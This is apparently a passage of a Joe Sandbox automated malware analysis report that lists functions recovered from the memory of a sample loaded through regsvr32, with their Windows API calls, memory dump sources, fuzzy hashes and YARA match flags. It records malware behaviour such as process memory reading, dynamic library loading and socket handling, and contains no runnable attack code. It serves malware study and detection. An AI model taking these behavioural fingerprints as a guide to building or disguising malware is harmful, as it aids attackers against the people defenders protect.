                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateErrorEventLast
                                                                  • String ID:
                                                                  • API String ID: 3743700123-0
                                                                  • Opcode ID: af77b15589d869b31cbb582a8d48f8dc5b8d17b895ef85dbcbb50f3167cdd8b0
                                                                  • Instruction ID: e4b2caec166d6cb1a6e2a5cc2cf9c0d4e178b801e811db168b11c98f1f9ba4c5
                                                                  • Opcode Fuzzy Hash: af77b15589d869b31cbb582a8d48f8dc5b8d17b895ef85dbcbb50f3167cdd8b0
                                                                  • Instruction Fuzzy Hash: F51129B06107067FE3109F358C41B95B7A4BF66308F108265F2189BB81EBB0D494C7A1
                                                                  Function 02632D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02632D3C
                                                                  • CancelIo.KERNEL32(?), ref: 02632D46
                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02632D4F
                                                                  • closesocket.WS2_32(?), ref: 02632D59
                                                                  • SetEvent.KERNEL32(00000001), ref: 02632D63
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                  • String ID:
                                                                  • API String ID: 1486965892-0
                                                                  • Opcode ID: 4c51554fff4b9ee11b9d59c2c84d679e3cb0630f161f8827e022de358ba1b7a4
                                                                  • Instruction ID: 2e5fe343da5bc9a9392d917abab55d23dd44a53dc17f4c7a0fbf98d266e51537
                                                                  • Opcode Fuzzy Hash: 4c51554fff4b9ee11b9d59c2c84d679e3cb0630f161f8827e022de358ba1b7a4
                                                                  • Instruction Fuzzy Hash: 3EF03C7A540700ABD3209F54DC49F5A77F8BB49B11F505A59F68297680C7B0B9848BA0
                                                                  Function 6C8A7CA0 Relevance: 6.4, APIs: 5, Instructions: 193COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000004), ref: 6C8A7CBB
                                                                  • memset.MSVCRT ref: 6C8A7D82
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8A7E08
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000), ref: 6C8A7E15
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000004), ref: 6C8A7E62
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$memset
                                                                  • String ID:
                                                                  • API String ID: 3732838118-0
                                                                  • Opcode ID: c3fe77403436817711885dbb76b6373f3b3a6dcb25a9bc0770869c86a6a82962
                                                                  • Instruction ID: a07b8fe76749b121f734908dc7aec39dd43ddfca3e7deb292bbb191cf5f8c3d7
                                                                  • Opcode Fuzzy Hash: c3fe77403436817711885dbb76b6373f3b3a6dcb25a9bc0770869c86a6a82962
                                                                  • Instruction Fuzzy Hash: 8B615871904340ABE7108F648D41BDAB7F4BFA570CF044918FA489B741E775E91987E2
                                                                  Function 02635E40 Relevance: 6.2, APIs: 4, Instructions: 186registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 02635E71
                                                                    • Part of subcall function 02635D70: _memset.LIBCMT ref: 02635D92
                                                                  • RegOpenKeyExW.KERNEL32(80000001,0264769C,00000000,00020019,?), ref: 0263601B
                                                                  • RegQueryValueExW.KERNEL32(?,026476AC,00000000,00000003,00000000,00000000), ref: 02636040
                                                                  • _memset.LIBCMT ref: 02636058
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$OpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 264051494-0
                                                                  • Opcode ID: 16efc1b962aa4c36183fb33e83015cc8f937e552439a994bc180ba3955c5dd8f
                                                                  • Instruction ID: 3c9ba49ddd92fe68c2ffd53a315e01e39c9fc11e82a7e38e263791b01c24efc9
                                                                  • Opcode Fuzzy Hash: 16efc1b962aa4c36183fb33e83015cc8f937e552439a994bc180ba3955c5dd8f
                                                                  • Instruction Fuzzy Hash: C35198B4BC174579F723BAA46C0BF5DBB564B15F04FA0004AB6833A2C15EE075844DAE
                                                                  Function 02636120 Relevance: 6.2, APIs: 4, Instructions: 172sleepsynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02637734: __fassign.LIBCMT ref: 0263772A
                                                                  • Sleep.KERNEL32(00000000), ref: 0263615C
                                                                    • Part of subcall function 026370D7: _malloc.LIBCMT ref: 026370F1
                                                                  • Sleep.KERNEL32(00000000), ref: 026362C1
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0263630D
                                                                    • Part of subcall function 02632C60: WSAStartup.WS2_32(00000202,?), ref: 02632CBF
                                                                    • Part of subcall function 02632C60: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02632CCA
                                                                    • Part of subcall function 02632C60: InterlockedExchange.KERNEL32(00000018,00000000), ref: 02632CD8
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02636357
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateEventSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                                                                  • String ID:
                                                                  • API String ID: 1042251235-0
                                                                  • Opcode ID: 2875d458f7d7aa69e61089d8da31bd556430c46a1214b58ad946d1e5f0efe4fd
                                                                  • Instruction ID: e3c68ce6747ecf2ff0e52f83d47690ff200e07974737b06f5d79209b19bfc5f2
                                                                  • Opcode Fuzzy Hash: 2875d458f7d7aa69e61089d8da31bd556430c46a1214b58ad946d1e5f0efe4fd
                                                                  • Instruction Fuzzy Hash: E551F5B4E82305AFEB01EFA4DCC1A6EB7B5BF49714F101A19E451A7380CF709950CB95
                                                                  Function 026370D7 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 026370F1
                                                                    • Part of subcall function 02637043: __FF_MSGBANNER.LIBCMT ref: 0263705C
                                                                    • Part of subcall function 02637043: __NMSG_WRITE.LIBCMT ref: 02637063
                                                                    • Part of subcall function 02637043: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02637088
                                                                  • std::exception::exception.LIBCMT ref: 02637126
                                                                  • std::exception::exception.LIBCMT ref: 02637140
                                                                  • __CxxThrowException@8.LIBCMT ref: 02637151
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                  • String ID:
                                                                  • API String ID: 615853336-0
                                                                  • Opcode ID: 77970f782aadafbbaf7a9ed2403f98918c1b21df278712a9780f300333e0c0d1
                                                                  • Instruction ID: 3ada6116d381a6de4736ae02b7c95d612ea17b9470d1c885ebef523645cb2fba
                                                                  • Opcode Fuzzy Hash: 77970f782aadafbbaf7a9ed2403f98918c1b21df278712a9780f300333e0c0d1
                                                                  • Instruction Fuzzy Hash: 2EF028B594010DBBEB07EFA1DD10A9EBBEBAB40718F10101DE441E61C0DFB0CA84CB99
                                                                  Function 6C87AFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 6C87AFED
                                                                  • K32GetPerformanceInfo.KERNEL32(?,00000038), ref: 6C87B056
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalInfoMemoryPerformanceStatus
                                                                  • String ID: @
                                                                  • API String ID: 3163563144-2766056989
                                                                  • Opcode ID: 7864199870d36e84eef8a7e023d50f8d7d6f4a0782004374e4ac4b9c66ba5048
                                                                  • Instruction ID: 5bcb30800b913d9573e863f3a765955f063e5884798e6ee8c159856574a7f264
                                                                  • Opcode Fuzzy Hash: 7864199870d36e84eef8a7e023d50f8d7d6f4a0782004374e4ac4b9c66ba5048
                                                                  • Instruction Fuzzy Hash: 0F3184709087C496E725CF3DC9457EAB7F9BFD8218F00CA19F99492551F731E2C48A91
                                                                  Function 04FA251A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 04FA25AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: .$.dll
                                                                  • API String ID: 1029625771-979041800
                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                  • Instruction ID: ec48b12f64749fc6a2931e91a42d764f18a0edf7be85a22167afc88ea7edbb91
                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                  • Instruction Fuzzy Hash: A1210AB5B002858FE721CFACC854A69BBA4BF05320F0A40ECD80187741D730F856C740
                                                                  Function 6C863E20 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C863ECA, 6C863F8A, 6C864139, 6C86423B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                  • API String ID: 0-3546870700
                                                                  • Opcode ID: baf40ef6b118ef34f56c91c3dd8fbcec6da7f93f92fc0308277f1fab9dfc8712
                                                                  • Instruction ID: e7d18b38140e32aede90c4e6441fc4c977318b95bb2e7911b7fa52127c5ebc39
                                                                  • Opcode Fuzzy Hash: baf40ef6b118ef34f56c91c3dd8fbcec6da7f93f92fc0308277f1fab9dfc8712
                                                                  • Instruction Fuzzy Hash: B7B1C471814B419BE320DF29C8417ABBBE4BFE6308F045B1CF9D02AA91FB75D1488792
                                                                  Function 02633140 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263314B
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02633163
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263320F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 4033114805-0
                                                                  • Opcode ID: 83e4014cfa7ad7b2381d2fe0fa786f5c63aef032fb419dfe99e26fb14bbb92d8
                                                                  • Instruction ID: 4eafb0d3498d5bd8a0996e7ffa5c98c8d16ea59c5d4d4666d6864160d6ff520d
                                                                  • Opcode Fuzzy Hash: 83e4014cfa7ad7b2381d2fe0fa786f5c63aef032fb419dfe99e26fb14bbb92d8
                                                                  • Instruction Fuzzy Hash: 163198742006069FC729DF69C880A6AB3E5FF44718B10C5ADE84ACB715D731F8A2CBD0
                                                                  Function 026311B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 026311E9
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02631226
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02631255
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  • Opcode ID: 93a7094dbbc9a2666815eeb616505fc74dffee754e06fd3a85709a876b281e44
                                                                  • Instruction ID: 95c151505857ce5e62feaff4fa8295d88cb73a011c66880dd8932ad3940f6ba0
                                                                  • Opcode Fuzzy Hash: 93a7094dbbc9a2666815eeb616505fc74dffee754e06fd3a85709a876b281e44
                                                                  • Instruction Fuzzy Hash: 9021D131E00309AFDB149FAAD881B6EFBF5FF40B05F0089ADE849E2640E770A8508B44
                                                                  Function 6C8FD485 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(6C982648,?,00000004,000000FF,6C8D1D45,6C9CA090,00000000), ref: 6C8FD4DF
                                                                  • GetLastError.KERNEL32 ref: 6C8FD4E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorLastWait
                                                                  • String ID:
                                                                  • API String ID: 1574541344-0
                                                                  • Opcode ID: e6a8cc46f310a3fcfde8221308d6e56336ffe8ed6d031ceb87d65fbf785b3056
                                                                  • Instruction ID: 0b274546d4dcf3ed044480558e060b1049cbde878795309d16fefe49aded1941
                                                                  • Opcode Fuzzy Hash: e6a8cc46f310a3fcfde8221308d6e56336ffe8ed6d031ceb87d65fbf785b3056
                                                                  • Instruction Fuzzy Hash: 5711D631B051064BDF15DE58C990AAE73B1EBA936CB30452AD321A7740EB35AD03C7A0
                                                                  Function 02631100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 0263112F
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0263115F
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02631192
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  • Opcode ID: a257a4dbe8fac76b9cba40db032e08c7b89d3fb39b604b3ae746ac96c4ace3ca
                                                                  • Instruction ID: 207c734f7ad00576de6f68291aea8228dfbc535ff1a64fc673675369ddb03650
                                                                  • Opcode Fuzzy Hash: a257a4dbe8fac76b9cba40db032e08c7b89d3fb39b604b3ae746ac96c4ace3ca
                                                                  • Instruction Fuzzy Hash: FB11D371E40309ABDB109FA9D882B6EFBF8EF04705F0088A9ED49E2240E770A850CB54
                                                                  Function 026332E0 Relevance: 4.5, APIs: 3, Instructions: 32sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000258), ref: 026332FE
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02633306
                                                                  • Sleep.KERNEL32(0000012C), ref: 0263332B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 2054240878-0
                                                                  • Opcode ID: d13aaf779bc3753cb4f739e1e4d692975be49c946eccb48a8385588eaf4a9e4b
                                                                  • Instruction ID: 02ae340ee124fad813ca7f0cde9d0211515e605957041e7c5ec791e6fc1742ba
                                                                  • Opcode Fuzzy Hash: d13aaf779bc3753cb4f739e1e4d692975be49c946eccb48a8385588eaf4a9e4b
                                                                  • Instruction Fuzzy Hash: D6F089751443046BD7109BA9DC84E4AF3E8AF95730B104B09F261876D0CAB0F8418BA0
                                                                  Function 02637335 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 02637341
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __endthreadex.LIBCMT ref: 02637351
                                                                    • Part of subcall function 02637316: __getptd_noexit.LIBCMT ref: 0263731B
                                                                    • Part of subcall function 02637316: __freeptd.LIBCMT ref: 02637325
                                                                    • Part of subcall function 02637316: RtlExitUserThread.NTDLL(?,?,02637356,00000000), ref: 0263732E
                                                                    • Part of subcall function 02637316: __XcptFilter.LIBCMT ref: 02637362
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                  • String ID:
                                                                  • API String ID: 4175385852-0
                                                                  • Opcode ID: 937dbff179be34bae52ada792bf179a26ba217d5648b197deb28cbeeee14325b
                                                                  • Instruction ID: 9fb88a14cdf8a75ee50ec98b47efe8903c1e3319009ee4f3b35ac3b572610f45
                                                                  • Opcode Fuzzy Hash: 937dbff179be34bae52ada792bf179a26ba217d5648b197deb28cbeeee14325b
                                                                  • Instruction Fuzzy Hash: 86E0ECB19456009FE71ABBA0C945E2DB776EF44702F20048DE1025B2A1CFB5AD40DE24
                                                                  Function 6C8765B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 241COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32(00000000,0000001A,00000000,00000000,00000000), ref: 6C876611
                                                                  Strings
                                                                  • ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\process.rs, xrefs: 6C876668
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID: ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\process.rs
                                                                  • API String ID: 1726664587-1582062572
                                                                  • Opcode ID: 9cece254575f30fae6fc987ef480ba04a93322b5d3f78ae97c9424e564e97936
                                                                  • Instruction ID: f3134c44ea044d1ddd2bfec502269bdb208bac0889999b285dcc5c63cdcd5d7a
                                                                  • Opcode Fuzzy Hash: 9cece254575f30fae6fc987ef480ba04a93322b5d3f78ae97c9424e564e97936
                                                                  • Instruction Fuzzy Hash: 6181D2B1D0121A9BDB30CF68DA40AEEB7B5EF46348F544A29E814EB641E735DC158BB0
                                                                  Function 6C85BA90 Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcmp.MSVCRT(?,?,5F28726F), ref: 6C85BB5C
                                                                  • PdhAddEnglishCounterW.PDH(?,8B3B74C0,00000000,00000000), ref: 6C85BBCD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CounterEnglishmemcmp
                                                                  • String ID:
                                                                  • API String ID: 2360070311-0
                                                                  • Opcode ID: 67848be46cf7d5e8833ab83a9947442005fcc3f1a27ef347bb242567cdfac6d5
                                                                  • Instruction ID: 3a52af871f12eb07975208100c15b8d8bc131888c56e2c3265248d3a6fc746ec
                                                                  • Opcode Fuzzy Hash: 67848be46cf7d5e8833ab83a9947442005fcc3f1a27ef347bb242567cdfac6d5
                                                                  • Instruction Fuzzy Hash: 6641F675904305AFD750CF28C981A6AB7E4FF94358F548A2CF8D4A7600E7B1E958CB92
                                                                  Function 6C876440 Relevance: 3.1, APIs: 2, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,6C876AD4), ref: 6C876450
                                                                  • LocalFree.KERNEL32(?,?,?), ref: 6C8764E9
                                                                    • Part of subcall function 6C8929C0: wcslen.MSVCRT ref: 6C8929CA
                                                                  Memory Dump Source
